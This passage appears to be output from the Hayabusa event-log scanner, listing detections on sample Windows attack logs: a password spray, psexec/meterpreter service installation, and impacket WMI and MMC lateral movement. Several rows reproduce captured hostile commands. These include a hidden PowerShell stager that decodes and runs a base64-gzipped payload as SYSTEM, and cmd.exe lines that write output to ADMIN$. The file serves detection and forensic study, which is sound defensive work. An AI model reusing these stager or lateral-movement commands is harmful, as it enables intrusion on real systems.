User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 
+2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Dia
gnostics.Process]::Start($s);"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Curl Start Combination,,rules/sigma/process_creation/win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,informational,Process Creation,"Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/
VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Dia
gnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,informational,Process Creation,"Command: 
""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 
05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:54.152 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,informational,Process Creation,Command: 
cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Whoami 
Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:35:11.856 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\mmc.exe -Embedding : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,MMC20 Lateral Movement,,rules/sigma/process_creation/win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> 